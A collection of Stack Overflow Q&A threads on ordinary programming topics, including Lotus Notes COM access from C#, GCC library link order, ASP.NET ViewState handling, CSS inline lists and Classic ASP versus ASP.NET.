A: I agree with Garo Yeriazarian, changing interface is a serious decision. Also, if you want to promote usage of new version of interface you should mark old version as obsolete. In .NET you can add ObsoleteAttribute.
A: The purpose of an interface is to define an abstract pattern that at type must implement.
It would be better implement as:
public interface ISomething
public class Something1 : ISomething
public class Something2 : ISomething
You do not gain anything in the form of code reusability or scalable design by creating multiple versions of the same interface.
A: I don't know why people downvote your post. I think that good naming guidelines are very important.
If you need to maintain compatibility with prev. version of the same interface consider using inheritance.
If you need to introduce new version of interface consider following rule:
Try to add meaningful suffix to you
interface. If it's not possible to
create concise name, consider adding
version number.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45123",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "12"
} |
Q: What is the best way and recommended practices for interacting with Lotus Notes from C# In particular, I have to extract all the messages and attachments from Lotus Notes files in the fastest and most reliable way. Another point that may be relevant is that I need to do this from a secondary thread.
Edit
Thanks for the answers - both of which are good. I should provide more background information.
We currently have a WinForms application with a background thread using the Notes COM API.
However it seems to be unstable. (Of course it may be we are doing something wrong.) For example, we have found we have to preinitialize the Notes session on the main thread or else the call to session.CreateDXLExporter() on the background thread throws an exception.
A: I really do hate that NotesSession COM object.
You cannot use it in another thread than the thread it was initialized.
Threads in .NET are fibers, the real underlying thread may change at any time.
So I suggest using it this way, in a using block :
Imports Domino
Imports System.Threading
Public Class AffinitedSession
Implements IDisposable
Private _session As NotesSession
Public Sub New(ByVal pass As String)
Thread.BeginThreadAffinity()
_session = New NotesSession()
_session.Initialize(pass)
End Sub
Public ReadOnly Property NotesSession() As NotesSession
Get
Return _session
End Get
End Property
Private disposedValue As Boolean = False ' To detect redundant calls
' IDisposable
Protected Overridable Sub Dispose(ByVal disposing As Boolean)
If Not Me.disposedValue Then
If disposing Then
' TODO: free other state (managed objects).
End If
' TODO: free your own state (unmanaged objects).
' TODO: set large fields to null.
_session = Nothing
Thread.EndThreadAffinity()
End If
Me.disposedValue = True
End Sub
#Region " IDisposable Support "
' This code added by Visual Basic to correctly implement the disposable pattern.
Public Sub Dispose() Implements IDisposable.Dispose
' Do not change this code. Put cleanup code in Dispose(ByVal disposing As Boolean) above.
Dispose(True)
GC.SuppressFinalize(Me)
End Sub
#End Region
End Class
Notice the Thread.BeginThreadAffinity() and the Thread.EndThreadAffinity()
Those are your friends.
Cheers !
A: An Lotus Notes COM Api Reference can be found here
To get a Notes Session (The starting point) in VB.Net you can use:
Dim oSess As Object = Nothing
oSess = CreateObject("Notes.NotesSession")
I normally program in C#, for operating with COM I prefer VB.Net
It is better to access all COM servers from the same thread, unless you are certain that is will not cause any trouble.
A: Take a look at NotesSQL:
http://www.ibm.com/developerworks/lotus/products/notesdomino/notessql/
A: If you have a Domino / Lotus Notes client installed on the same machine, you can use COM. Just do a Google search on 'Accessing the Domino Objects through COM' and you'll find the Domino Designer help entry for just about any version of Domino.
You can also access Domino via the C API, but wouldn't recommend it. Very messy. You also still need the Domino / Lotus Notes client installed.
If you do not have Domino / Lotus Notes client installed on the same machine and the Domino server is running http, you could also do it via http. This will not be nearly as fast. You would also probably want some custom http views setup on the Domino server to make your life easier.
A: You could create a Domino web service using Java or LotusScript. Then use C# to access the web service.
I've only done this once, to read data out of an Lotus Notes db into a .NET app running on another machine.
Writing and testing simple Web services
http://www.ibm.com/developerworks/lotus/library/web-services2/
when i find some time I will write a complete example :-)
A: I worked on a Notes plugin for several months a little while back, and yes, the API can be maddening. However, I was able to get it to work so I could access all the Notes information using a C# application (actually, since I was writing a plugin, I had Notes call out to the C# app through a C++ bridge that it registered in a startup .ini file). Certain methods that they document in their API don't actually work though, so a lot of testing is required. Sometimes you have to do some code gymnastics...
A: Back in the day I would have recommended N2N from Proposion, but that product has gone since Quest acquired Proposion.
That said, Proposion was proof that you can wrap the Notes API in a set of .Net classes safely. You can find some info on that in Bob Balaban's blog.
A: I know this thread is old, but I've worked a lot with the Domino API and the typical Notes LotusScript objects via the Domino COM API.
The problem with the Domino API is that its memory management via COM is horrible (if using the API in C#, or VB, etc.), and it will cause memory leaks and eventually cause the whole API and the Notes client to crash (even if you don't have the client open, you will not be able to start it after the API crashes without restarting your computer, or calling "nsd -kill"). Fun.
I've found that using the Notes C API within C# via P/Invoke, you can better manage the memory resources so that the API doesn't cause horrible memory leaks and crashes. I wrote a partial wrapper in C#, using P/Invoke, that accesses the Notes C API from the notes.dll. My use of it has nothing to do with trying to work within a Domino environment, but to make use of the Notes assembly to have access to NSF files to extract DXL information within a C# environment. Obviously, you would need to have the Notes client installed to have access to the notes.dll and the C API. But my C# wrapper of the Notes C API works great and is more stable than the Domino COM API that is provided when you install the Notes client.
The classes that I've implemented in C# (that I've only needed) from the Notes C API are:
NotesSession (as NotesRuntime)
NotesDatabase
NotesNote
NotesItem
NotesDXLExporter
NotesNoteCollection
As well as some other interim classes, enums, and structs to handle the translation from the C API into C#.
The classes I've implemented thus far have served the purposes that I've needed from the Notes C API. They can definitely be expanded upon, but I didn't try to encapsulate the entire API within the C# P/Invoke wrapper. I also had to create handlers for dealing with OLE embedded objects that may be stored within Notes documents, and getting the stored data out of those OLE objects, using Windows IStorage objects.
Note: I can provide some samples later (I have to rename namespaces and generalize the code, due to proprietary reasons), but I created the C# wrapper classes by using the "Lotus C API Notes/Domino 8.5.2 Reference" NSF that is provided by IBM/Lotus (as a downloadable NSF). Using the C definitions and class references, I could translate those to C# P/Invoke calls and wrap them into friendlier C# classes, that then behaved more like LotusScript class calls, but within C#, and the implemented classes manage and dispose of their memory so that the whole thing doesn't crash after you've accessed hundreds of thousands of documents from a C# program. :)
A: I would personally do this native in Notes in either LotusScript or Java. You can do a scheduled agent in Notes much easier than a service in C#.
A: I personally quite like Domino wrapped .NET assembly for COM API. When you develop your C# code you almost can imagine your dreams about a proper Notes IDE became true. But it has some drawbacks like for the version 6.5 (I haven't tried newer) you get your application crashes in many cases when the LotusScript code returns type mismatch for the parameter. But this is due to COM limitations of course.
At the same time the wrapper doesn't allow working with NotesUI classes. However I used reflections from very old Notes COM API examples to call NotesUI classes and it worked. It was handy when I developed an Outlook plug-in that required interaction with Notes client UI. I managed to create a simple wrapper for UI classes too.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45132",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "16"
} |
Q: Why does the order in which libraries are linked sometimes cause errors in GCC? Why does the order in which libraries are linked sometimes cause errors in GCC?
A: A quick tip that tripped me up: if you're invoking the linker as "gcc" or "g++", then using "--start-group" and "--end-group" won't pass those options through to the linker -- nor will it flag an error. It will just fail the link with undefined symbols if you had the library order wrong.
You need to write them as "-Wl,--start-group" etc. to tell GCC to pass the argument through to the linker.
A: (See the history on this answer to get the more elaborate text, but I now think it's easier for the reader to see real command lines).
Common files shared by all below commands
// a depends on b, b depends on d
$ cat a.cpp
extern int a;
int main() {
return a;
}
$ cat b.cpp
extern int b;
int a = b;
$ cat d.cpp
int b;
Linking to static libraries
$ g++ -c b.cpp -o b.o
$ ar cr libb.a b.o
$ g++ -c d.cpp -o d.o
$ ar cr libd.a d.o
$ g++ -L. -ld -lb a.cpp # wrong order
$ g++ -L. -lb -ld a.cpp # wrong order
$ g++ a.cpp -L. -ld -lb # wrong order
$ g++ a.cpp -L. -lb -ld # right order
The linker searches from left to right, and notes unresolved symbols as it goes. If a library resolves the symbol, it takes the object files of that library to resolve the symbol (b.o out of libb.a in this case).
Dependencies of static libraries against each other work the same - the library that needs symbols must be first, then the library that resolves the symbol.
If a static library depends on another library, but the other library again depends on the former library, there is a cycle. You can resolve this by enclosing the cyclically dependent libraries by -( and -), such as -( -la -lb -) (you may need to escape the parens, such as -\( and -\)). The linker then searches those enclosed lib multiple times to ensure cycling dependencies are resolved. Alternatively, you can specify the libraries multiple times, so each is before one another: -la -lb -la.
Linking to dynamic libraries
$ export LD_LIBRARY_PATH=. # not needed if libs go to /usr/lib etc
$ g++ -fpic -shared d.cpp -o libd.so
$ g++ -fpic -shared b.cpp -L. -ld -o libb.so # specifies its dependency!
$ g++ -L. -lb a.cpp # wrong order (works on some distributions)
$ g++ -Wl,--as-needed -L. -lb a.cpp # wrong order
$ g++ -Wl,--as-needed a.cpp -L. -lb # right order
It's the same here - the libraries must follow the object files of the program. The difference here compared with static libraries is that you need not care about the dependencies of the libraries against each other, because dynamic libraries sort out their dependencies themselves.
Some recent distributions apparently default to using the --as-needed linker flag, which enforces that the program's object files come before the dynamic libraries. If that flag is passed, the linker will not link to libraries that are not actually needed by the executable (and it detects this from left to right). My recent archlinux distribution doesn't use this flag by default, so it didn't give an error for not following the correct order.
It is not correct to omit the dependency of b.so against d.so when creating the former. You will be required to specify the library when linking a then, but a doesn't really need the integer b itself, so it should not be made to care about b's own dependencies.
Here is an example of the implications if you miss specifying the dependencies for libb.so
$ export LD_LIBRARY_PATH=. # not needed if libs go to /usr/lib etc
$ g++ -fpic -shared d.cpp -o libd.so
$ g++ -fpic -shared b.cpp -o libb.so # wrong (but links)
$ g++ -L. -lb a.cpp # wrong, as above
$ g++ -Wl,--as-needed -L. -lb a.cpp # wrong, as above
$ g++ a.cpp -L. -lb # wrong, missing libd.so
$ g++ a.cpp -L. -ld -lb # wrong order (works on some distributions)
$ g++ -Wl,--as-needed a.cpp -L. -ld -lb # wrong order (like static libs)
$ g++ -Wl,--as-needed a.cpp -L. -lb -ld # "right"
If you now look into what dependencies the binary has, you note the binary itself depends also on libd, not just libb as it should. The binary will need to be relinked if libb later depends on another library, if you do it this way. And if someone else loads libb using dlopen at runtime (think of loading plugins dynamically), the call will fail as well. So the "right" really should be a wrong as well.
A: Here's an example to make it clear how things work with GCC when static libraries are involved. So let's assume we have the following scenario:
*
*myprog.o - containing main() function, dependent on libmysqlclient
*libmysqlclient - static, for the sake of the example (you'd prefer the shared library, of course, as the libmysqlclient is huge); in /usr/local/lib; and dependent on stuff from libz
*libz (dynamic)
How do we link this? (Note: examples from compiling on Cygwin using gcc 4.3.4)
gcc -L/usr/local/lib -lmysqlclient myprog.o
# undefined reference to `_mysql_init'
# myprog depends on libmysqlclient
# so myprog has to come earlier on the command line
gcc myprog.o -L/usr/local/lib -lmysqlclient
# undefined reference to `_uncompress'
# we have to link with libz, too
gcc myprog.o -lz -L/usr/local/lib -lmysqlclient
# undefined reference to `_uncompress'
# libz is needed by libmysqlclient
# so it has to appear *after* it on the command line
gcc myprog.o -L/usr/local/lib -lmysqlclient -lz
# this works
A: You may can use -Xlinker option.
g++ -o foobar -Xlinker -start-group -Xlinker libA.a -Xlinker libB.a -Xlinker libC.a -Xlinker -end-group
is ALMOST equal to
g++ -o foobar -Xlinker -start-group -Xlinker libC.a -Xlinker libB.a -Xlinker libA.a -Xlinker -end-group
Careful !
*
*The order within a group is important !
Here's an example: a debug library has a debug routine, but the non-debug
library has a weak version of the same. You must put the debug library
FIRST in the group or you will resolve to the non-debug version.
*You need to precede each library in the group list with -Xlinker
A: If you add -Wl,--start-group to the linker flags it does not care which order they're in or if there are circular dependencies.
On Qt this means adding:
QMAKE_LFLAGS += -Wl,--start-group
Saves loads of time messing about and it doesn't seem to slow down linking much (which takes far less time than compilation anyway).
A: I have seen this a lot, some of our modules link in excess of a 100 libraries of our code plus system & 3rd party libs.
Depending on different linkers HP/Intel/GCC/SUN/SGI/IBM/etc you can get unresolved functions/variables etc, on some platforms you have to list libraries twice.
For the most part we use structured hierarchy of libraries, core, platform, different layers of abstraction, but for some systems you still have to play with the order in the link command.
Once you hit upon a solution document it so the next developer does not have to work it out again.
My old lecturer used to say, "high cohesion & low coupling", it’s still true today.
A: Link order certainly does matter, at least on some platforms. I have seen crashes for applications linked with libraries in wrong order (where wrong means A linked before B but B depends on A).
A: The GNU ld linker is a so-called smart linker. It will keep track of the functions used by preceding static libraries, permanently tossing out those functions that are not used from its lookup tables. The result is that if you link a static library too early, then the functions in that library are no longer available to static libraries later on the link line.
The typical UNIX linker works from left to right, so put all your dependent libraries on the left, and the ones that satisfy those dependencies on the right of the link line. You may find that some libraries depend on others while at the same time other libraries depend on them. This is where it gets complicated. When it comes to circular references, fix your code!
A: Another alternative would be to specify the list of libraries twice:
gcc prog.o libA.a libB.a libA.a libB.a -o prog.x
Doing this, you don't have to bother with the right sequence since the reference will be resolved in the second block.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45135",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "566"
} |
Q: What are you currently using for data access? What particular method/application are you using to communicate between your application and a database? Custom code with stored procedures? SubSonic? nHibernate? Entity Framework? LINQ?
A: I primarily use Microsoft Enterprise Library Data Access Block to access stored procedures in MS SQL Server databases.
A: I've been using NHibernate for the last year or so, and it's proved to be a really quick way of getting basic CRUD (almost) for free.
If this is something you're looking to get into, I can recommend Billy McCafferty's NHibernate best practices article on CodeProject:
http://www.codeproject.com/KB/architecture/NHibernateBestPractices.aspx
This has proven to be a great scalable and flexible solution and makes it easy to achieve a clear separation of the DAL from the other layers.
A: We're using IdeaBlade on our projects. I've found it to be pretty easy to use.
A: I used Hibernate in my previous job to connect to both MySql and Sql Server but I have since switched over to .NET so currently I work with LINQ and I really enjoy it.
A: At work our code base is C++ and Perl and we talk to a MySQL database. For our interface we have some fairly thin custom classes wrapped around the basic MySQL client libraries for our C++ code and the DBI module for our Perl scripts.
A: SubSonic and LINQ to SQL, hopefully one day soon LINQ to SubSonic though!
A: I primarily use NHibernate, both at work and on my freetime projects. This started as an attempt to break out of the norm at work to use ADO.NET datareaders/datasets and we now have a few projects using Hibernate/NHibernate.
A: SqlHelper class from the older version of the MS Enterprise App Blocks. It is far from perfect, but hard to beat its simplicity for simple CRUD apps.
A: MS SQL Stored Procedures.
A: I usually create a DataTier with LiNQ.
It consist of repositories that implement composite interfaces, so I have total flexibility on how to use them.
IPersonRepository : IReadRepository<Person>, ICreateRepository<Person>, IUpdateRepository<Person> //and so on..
They are mostly domain object centric, so they emit domain objects and take care of all the mapping logic themselves.
They might also create some list dictionaries, f.ex a dictionary consisting of the id and name of a person, so I don't have to pull up too much from the db to display a drop down list.
Although sometimes, for smaller projects, I just use Attribute base mapping without a .dbml.
I feel that this approach gives a very clean application model, because all the messy data centric logic is hidden in the DataTier. The Business-/ServiceTier is pure business :)
A: *
*SQL Server
*All stored procedures
*Handrolled polymorphic entity framework that I reuse from project to project to handle the Sproc Resultset -> Object mapping.
I guess that makes me oldschool.
A: MVC framework where model's has datasource classes with the actual database language, the developer in most cases uses save, saveField, delete, find etc methods and the framework translates this to sql queries. This is not only safer and easier, it is also very convenient in that the code is datasource indepenedent, ie you can change database server and keep the code.
A: I've started with Hibernate on Java project at my workplace, and then realized that there exist the .Net port (NHibernate) and used it again in a .Net project. I've also came across the article that joesteele mentions, and used it as a base for my projects with some minor modifications when needed, mostly when needed to target transaction beginning and ending manually.
The same practice and library that can be applied to both Java and C# platforms, targeting the Windows, or Linux as application platforms, makes development on different platforms easier than needing to learn different frameworks.
Although i'm planning to exmine the Subsonic, iBatis and LINQ, for now Hibernate and NHibernate seem like the right tool for the job while i have to target both Windows and Linux platforms.
A: We've got an oracle back end with something like 500 stored procedures where applications run directly against the data.
I started building a custom or-mapped domain model that I've been integrating but I did it wrong initially and now am stuck dealing with that headache as well...ugh
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45152",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: WebDAV query trouble - unable to read body of e-mail Our group (corporate environment) needs to monitor a couple of faceless accounts' Outlook inbox for specific types of bounced e-mails.
WebDAV (using C# 2.0) is one of the paths we've traveled and we're almost there, except for one minor problem: we're getting the response below for the e-mail body element
<a:propstat>
<a:status>HTTP/1.1 404 Resource Not Found</a:status>
- <a:prop>
<a:htmldescription />
<a:textdescription />
</a:prop>
</a:propstat>
The only real commonality is that it only happens on messages that our Exchange server is returning to us as "Undeliverable". Note: All other e-mails come across just fine.
Any thoughts?
A: It looks like undeliverable messages in Exchange have a content-type of "multipart/report; report-type=delivery-status". Probably because they don't have a body, just a summary of the delivery attempt which can actually all be gathered from the Headers of the message. Perhaps the WebDAV access (I don't have access to an OWA account right now to check) doesn't know what to do with that, i.e. is just thinks the e-mails don't have a body.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45155",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: How do I convert a list with graphical links to an inline list? Given this HTML:
<ul id="topnav">
<li id="topnav_galleries"><a href="#">Galleries</a></li>
<li id="topnav_information"><a href="#">Information</a></li>
</ul>
And this CSS:
#topnav_galleries a, #topnav_information a {
background-repeat: no-repeat;
text-indent: -9000px;
padding: 0;
margin: 0 0;
overflow: hidden;
height: 46px;
width: 136px;
display: block;
}
#topnav { list-style-type: none; }
#topnav_galleries a { background-image: url('image1.jpg'); }
#topnav_information a { background-image: url('image2.jpg'); }
How would I go about turning the topnav list into an inline list?
A: Try this:
#topnav {
overflow:hidden;
}
#topnav li {
float:left;
}
And for IE you will need to add the following:
#topnav {
zoom:1;
}
Otherwise your floated < li > tags will spill out of the containing < ul >.
A: An alternative to floating the elements left, is this:
#topnav li {
display: inline;
}
A: Another approach would be to use display: inline-block for li s:
#topnav li {
display: inline-block;
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45163",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Stream data (such as music) using PHP (or another language) For years, I've been investigating how to create music streams from my computer. I've seen programs, but anything useful I've seen is Windows only (I use a Mac).
Eventually, I got interested in how streams work. Is there any way I could create my own stream, possibly using socket functions in PHP? Is there a PHP library for this?
A: Take a look at Ampache. It is a Web-based Open Source Audio file manager. It is implemented with MySQL, and PHP. It allows you to view, edit, and play your audio files via the web.
A: In the end it all boils down to the protocol you'd want to use. Shoutcast IMHO is plain HTTP, so to make your own stream, you just output the streams content.
To make an ogg based webradio work with my Sonos system, I have created a little transcoding wrapper around sox which is is actually written in PHP, so it may be helpful to you to serve as an example.
You'll find it here: http://www.gnegg.ch/ogg2mp3/
If you are after implementing your very own streaming protocol - maybe even UDP based, then, I'm afraid, PHP may not be the right solution for the problem - at least not as long as it has its share of problems when used for long running processes (which 5.3 may bring some help for with its integrated garbage collection)
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45166",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: How do I return an array of strings from an ActiveX object to JScript I need to call into a Win32 API to get a series of strings, and I would like to return an array of those strings to JavaScript. This is for script that runs on local machine for administration scripts, not for the web browser.
My IDL file for the COM object has the interface that I am calling into as:
HRESULT GetArrayOfStrings([out, retval] SAFEARRAY(BSTR) * rgBstrStringArray);
The function returns correctly, but the strings are getting 'lost' when they are being assigned to a variable in JavaScript.
The question is:
What is the proper way to get the array of strings returned to a JavaScript variable?
A: If i recall correctly, you'll need to wrap the SAFEARRAY in a VARIANT in order for it to get through, and then use a VBArray object to unpack it on the JS side of things:
HRESULT GetArrayOfStrings(/*[out, retval]*/ VARIANT* pvarBstrStringArray)
{
// ...
_variant_t ret;
ret.vt = VT_ARRAY|VT_VARIANT;
ret.parray = rgBstrStringArray;
*pvarBstrStringArray = ret.Detach();
return S_OK;
}
then
var jsFriendlyStrings = new VBArray( axOb.GetArrayOfStrings() ).toArray();
A: Shog9
is correct. COM scripting requires that all outputs be VARIANTS.
In fact, it also requires that all the INPUTs be VARIANTS as well -- see the nasty details of IDispatch in your favorite help file. It's only thought the magic of the Dual Interface implementation by ATL and similar layers (which most likely is what you are using) that you don't have to worry about that. The input VARIANTs passed by the calling code are converted to match your method signature before your actual method is called.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45169",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: What do you do when you can't use ViewState? I have a rather complex page that dynamically builds user controls inside of a repeater. This repeater must be bound during the Init page event before ViewState is initialized or the dynamically created user controls will not retain their state.
This creates an interesting Catch-22 because the object I bind the repeater to needs to be created on initial page load, and then persisted in memory until the user opts to leave or save.
Because I cannot use ViewState to store this object, yet have it available during Init, I have been forced to store it in Session.
This also has issues, because I have to explicitly null the session value during non postbacks in order to emulate how ViewState works.
There has to be a better way to state management in this scenario. Any ideas?
Edit: Some good suggestions about using LoadViewState, but I'm still having issues with state not being restored when I do that.
Here is somewhat if the page structure
Page --> UserControl --> Repeater --> N amount of UserControls Dynamicly Created.
I put the overridden LoadViewState in the parent UserControl, as it is designed to be completely encapsulated and independent of the page it is on. I am wondering if that is where the problem is.
A: The LoadViewState method on the page is definitely the answer. Here's the general idea:
protected override void LoadViewState( object savedState ) {
var savedStateArray = (object[])savedState;
// Get repeaterData from view state before the normal view state restoration occurs.
repeaterData = savedStateArray[ 0 ];
// Bind your repeater control to repeaterData here.
// Instruct ASP.NET to perform the normal restoration of view state.
// This will restore state to your dynamically created controls.
base.LoadViewState( savedStateArray[ 1 ] );
}
SaveViewState needs to create the savedState array that we are using above:
protected override object SaveViewState() {
var stateToSave = new List<object> { repeaterData, base.SaveViewState() };
return stateToSave.ToArray();
}
Don't forget to also bind the repeater in Init or Load using code like this:
if( !IsPostBack ) {
// Bind your repeater here.
}
A:
This also has issues, because I have to explicitly null the session value during non postbacks in order to emulate how ViewState works.
Why do you have to explicitly null out the value (aside from memory management, etc)? Is it not an option to check Page.IsPostback, and either do something with the Session variable or not?
A: I have always recreated my dynamic controls in the LoadViewState event. You can store the number of controls needed to be created in the viewstate and then dynamically create that many of them using the LoadControl method inside the LoadViewState event. In this event you have access to the ViewState but it has not been restored to the controls on the page yet.
A: 1) there's probably a way to get it to work... you just have to make sure to add your controls to the tree at the right moment. Too soon and you don't get ViewState. Too late and you don't get ViewState.
2) If you can't figure it out, maybe you can turn off viewstate for the hole page and then rely only on querystring for state changes? Any link that was previously a postback would be a link to another URL (or a postback-redirect).
This can really reduce the weight of the page and make it easier to avoid issues with ViewState.
A: protected override void LoadViewState(object savedState)
{
// Put your code here before base is called
base.LoadViewState(savedState);
}
Is that what you meant? Or did you mean in what order are the controls processed? I think the answer to that is it quasi-random.
Also, why can't you load the objects you bind to before Page_Load? It's ok to call your business layer at any time during the page lifecycle if you have to, with the exception of pre-render and anything after.
A:
I have to explicitly null the session
value during non postbacks in order to
emulate how ViewState works.
I'm still foggy as to why you can't store whatever object(s) you are binding against in session. If you could store that object in session the following should work:
*
*On first load bind your top user control to the object during OnPreInit. Store the object in session. Viewstate will automatically be stored for those controls. If you have to bind the control the first time on Page_Load that is ok, but you'll end up having two events that call bind if you follow the next step.
*On postback, rebind your top user user control in the OnPreInit method against the object you stored in session. All of your controls should be recreated before the viewstate load. Then when viewstate is restored, the values will be set to whatever is in viewstate. The only caveat here is that when you bind again on the postback, you have to make 100% sure that the same number of controls are created again. The key to using Repeaters, Gridviews etc... with dynamic controls inside of them is that they have to be rebound on every postback before the viewstate is loaded. OnPreInit is typically the best place to do this. There is no technical constraint in the framework that dictates that you must do all your work in Page_Load on the first load.
This should work. However, if you can't use session for some reason, then you'll have to take a slightly different approach such as storing whatever you are binding against in the database after you bind your control, then pulling it out of the database and rebinding again on every postback.
Am I missing some obvious detail about your situation? I know it can be very tricky to explain the subtleties of the situation without posting code.
EDIT: I changed all references to OnInit to OnPreInit in this solution. I forgot that MS introduced this new event in ASP.NET 2.0. According to their page lifecycle documentation, OnPreInit is where dynamic controls should be created/recreated.
A: When creating dynamic controls ... I only populate them on the initial load. Afterwords I recreate the controls on postback in the page load event, and the viewstate seems to handle the repopulating of the values with no problems.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/45176",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Are there benefits to Classic ASP over ASP.net Having worked with Classic ASP for about 2 years now by creating a few 100 simple web forms I can't see a good reason for switching to .net; however, I'm not that versed in .net so I'm sure I could be missing a few things.
Some points that I often hear around work can be found here: http://www.packtpub.com/article/Classic-ASP (not that I share all of these thoughts, but it's a good jumping off point)
I'm very interested to hear what others have to say on this matter.
A: If you look back at your old code and say, "What was I thinking! This is rubbish, I write code much better now!" then you have developed as a programmer.
If the sites are fairly temporary (i.e. you build it quickly, it gets used for a specific purpose and amount of time and then it is effectively closed) then banging out these sites in the most comfortable way for you is perfectly acceptable.
If you have a long list of bugs, fixes and improvements that you now need (or would like) to backport to your old sites, or your "small sites" are getting bigger and more complidated and this is causing you significant grief then you need to take a step back and re-evaluate how you structure and support these sites.
I would very much agree that ASP.NET is a very much more mature and effective programming environment. However, like any tool, you need to know (or learn) the right way to use it as it's not going to automatically turn you into a "super programmer" overnight.
A way to break the ice is to agree with your boss that the next "site" you create is developed in ASP.NET. Explain to him that it will take quite a lot longer than how you currently deliver sites because you have to "get your head around" ASP.NET, but the benefits are x,y and (exercise left to the reader!)
Personally, I'm still in the transition phase (and I started using ASP.NET from v1!) as I have a fairly robust Classic ASP framework I'm developed and comfortable with. However, I have used ASP.NET strategically and have found it VERY powerful and your do end up writing must less code, as so much is built into the .net framework, as long as you can find it in documentation.
I also recommend that you DONT use VB.NET and your bite the bullet to use C#. The change of language is quite minor, but you reduce the chances of writing your sites exactly the same was as you used to. It helps break the bad habits annd gives you a chance to learn new techniques.
Good Luck!
A: You're missing more than a few things! ASP.NET is orders of magnitudes more productive, robust, and maintainable than old-school ASP ever thought about being. Server side controls, third-party controls, master pages, forms authentication, forms validation, an OO model than encourages appropriate application partitioning, easy deployment, built-in debugging and tracing, state management.
You even have the choice of WebForms or MVC. It's not an understatement to say that you are simply out of your mind if you don't thoroughly investigate what you're missing.
A: For simple sites, I actually prefer ASP vs. ASP.NET, especially if you know HTML well. However with ASP, separating business logic from view is hard; the code you write will likely be challenging to read + maintain.
PHP is better than ASP though - and somewhat similar at the basic level. And you could always go to Rails or Django, if you're interested in self-contained web development stack (but a lot longer learning curve).
A: I have one word "debugging" - you never want to have to use it but you always do. In .Net if you're using Visual Studio you have a fantastic debugger when compared to trying to debug code on ASP.
A: Rarely does a response in this thread answer the question. Instead of taking the easy way out, I'll take a stab at it:
A few benefits that have not been mentioned (JScript-centric):
*
*You can learn the entire language and keep it in your memory if you use it enough - I don't know anyone who claims to know the entire .NET framework; this makes coding very rapid.
*Weak typing - this can let you code more rapidly when banging something out quickly, e.g., do you really care about the difference between char and string most of the time? (insert religious flame-war here)
*Eval: this much-maligned keyword is actually incredibly powerful, and lets you manipulate your code at runtime in really interesting ways
*Client/server language compatibility: JScript's similarity to Javascript means that you can use the same include file for server-side validation as you use for client-side.
A: If you like ASP, and want to move to ASP.NET, skip Webforms and learn MVC.
A: One advantage to ASP.NET is that you have the option of coding your site exactly as you did with classic ASP, along with access to the richness of the .NET framework. You can keep existing functionality and add new ASP.NET functionality were needed. They mix well.
Unfortunately the author of the referenced article isn't very well versed in the technology behind ASP.NET as evident by his remarks (and maybe not even classic ASP). Most of his points are invalid or simply wrong.
A: Everyone here has made valid points.
I was a classic ASP developer until 3 yrs ago when I switched to .NET 2.0.
I couldn't go back (even though I do still have to fix a handful of classic ASP sites).
I do miss having a recordset object, data repeaters are great for displaying data quickly, but datasets, whilst offering wonderful functionality, are dame awful when it comes to performance on 'big' sites. In fairness I've been doing datasets in a roundabout way with Arrays in classic ASP. The only time I use datasets is for my e-commerce site baskets. I do miss rs.movenext, etc...
FlySwat has made one of the biggest mistakes that I see a lot of developers make.
Yes business logic, OO etc... that .NET brings is great (scalability I wouldn’t 100% agree with, but definitely more extensible), but when using ASP.NET you are still creating a WEB SITE. Forget this nonsense of using the terminology ‘application’. I have meet many great .NET developers who build n-tier, OO sites, but they have no real understanding of the uniqueness of building a web site; such as state, or the bloody annoying problem that they over rely on Javascript. Most of these developers build MS type sites which don't normally meet W3C, aren’t cross browser friendly and never gracefully degrade. And no it is not acceptable even for back office applications to be only compatible with IE.
.NET also tends to 'fatten' simple sites. .NET in many ways was a way of getting WinForm developers to start building web sites (or as they prefer, web apps.). The problem was that this brought with it a bunch of developers who had the luxuries not having to worry about state, standards, etc...
I still maintain that any .NET site can be built in classic ASP and run faster (page response times) for the end user....
...BUT though I have fond memories of classic ASP, what I can do with .NET in terms of imaging, encryption, compression, easy web service integration, proper OO, decent n-tier, extensibility, etc...is what gives .NET the advantage. Even silly things like simply adding one line of code to the web.config to tell it to write the sessionID to the querystring if the user doesn’t accept cookies (this was a pain in classic ASP) is great.
Move to .NET, you won’t regret it, but do give yourself sometime (particularly if you don’t know about OO (inheritance, abstraction, polymorphism and encapsulation). Don’t start building .NET sites in classic compatibility mode, it’s just a cheap way of doing .NET and you’ll still end up using classic ASP practises. If VBScript was your main development language, the jump is no were near as easy as MS or others would have you believe.
Most importantly for me is that I have carried across, from my classic ASP days, fundamental web site application (;-)) design and this should never change between languages.
A: If all you make is simple little web pages, then do whatever. Or better yet learn PHP. Most of the response you are going to get are from people who make web applications, and for that asp.net blows the pants off of classic asp in power and maintainability though.
A: The biggest issue for me is that I create applications, not websites...The UI is a minor part of the problem, the big part is writing the business logic layer, and various enterprise communication components (Connecting to SAP using SOAP? No Problem!).
The .NET Toolkit allows me to program in a wonderful object oriented language (C#) and has a robust framework to help out.
VbScript is a godawful language to try and write a business application in.
However, if all you do is a simple little webform, then sure, use VbScript.
As far as your link, it basically boils down:
*
*WaaWaa, I don't like Visual Studio
*WaaWaa, I want to edit production code on the production server like an idiot.
*WaaWaa, I don't know that deploying a single compiled DLL is all that a small site needs to deploy a asp.net app.
Basicly, its ignorance in a nutshell.
A: To focus on the specific question ("benefits of Classic vs .Net"), there are only two things I can think of Classic does that .Net won't:
1) Includes. They just don't work like you expect in ASP.Net. Of course, ASP.Net provides much better ways of accomplishing the same thing, but it's still a bit of a loss and can make migrating an old site to .Net a pain.
